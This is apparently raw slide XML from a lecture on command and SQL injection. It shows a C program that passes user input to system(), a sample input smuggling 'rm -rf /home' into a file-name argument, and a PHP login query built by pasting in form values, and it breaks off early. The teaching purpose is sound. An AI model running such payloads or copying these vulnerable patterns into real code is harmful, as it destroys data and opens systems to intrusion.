            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:t>argv) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>cmd </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> malloc(strlen(argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>]) </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    strcpy(cmd, “head </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:t> ”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    strcat(cmd, argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    system(cmd);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>}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Command Injection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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Source:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="7139076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rPr b="1"/>
              <a:t>Source:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0433FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:t>argv) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>cmd </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> malloc(strlen(argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>]) </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    strcpy(cmd, “head </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:t> ”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    strcat(cmd, argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    system(cmd);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:br/>
            <a:r>
              <a:rPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr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Normal Input</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr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</a:t>
            </a:r>
            <a:endParaRPr b="1"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indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="1">
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   ./head10 myfile.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> system(“head -n 100 myfile.txt”)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Command Injection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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Source:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="7842714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rPr b="1"/>
              <a:t>Source:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0433FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:t>argv) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C01E51"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>cmd </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t> malloc(strlen(argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>]) </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    strcpy(cmd, “head </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:t> ”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    strcat(cmd, argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="797979"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    system(cmd);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:br/>
            <a:r>
              <a:rPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr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Adversarial Input</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr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</a:t>
            </a:r>
            <a:endParaRPr b="1"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indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="1">
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   ./head10 “myfile.txt; rm -rf /home” </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> system(“head -n 100 myfile.txt; rm -rf /home”);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QL Injection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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Last examples all focused on shell injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="17380555" cy="5339679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Last examples all focused on </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:t> injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Command injection oftentimes occurs when developers try to build SQL queries that use user-provided data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Known as SQL injection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3" name="login-form-8.jpg" descr="login-form-8.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="23896" t="10773" r="23896" b="10773"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109440" y="3301007"/>
            <a:ext cx="7956244" cy="9425465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="SQL Injection Exampl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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>SQL Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="$login = $_POST['login'];…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9434638" y="3695673"/>
            <a:ext cx="14020020" cy="8102654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800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$login = $_POST['login'];</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pass = $_POST['password'];  </a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>        WHERE username = '$login'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>        AND password = '$password'”;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   // success</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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Non-Malicious Inpu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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Non-Malicious Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="$u = $_POST['login’]; // zakir…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
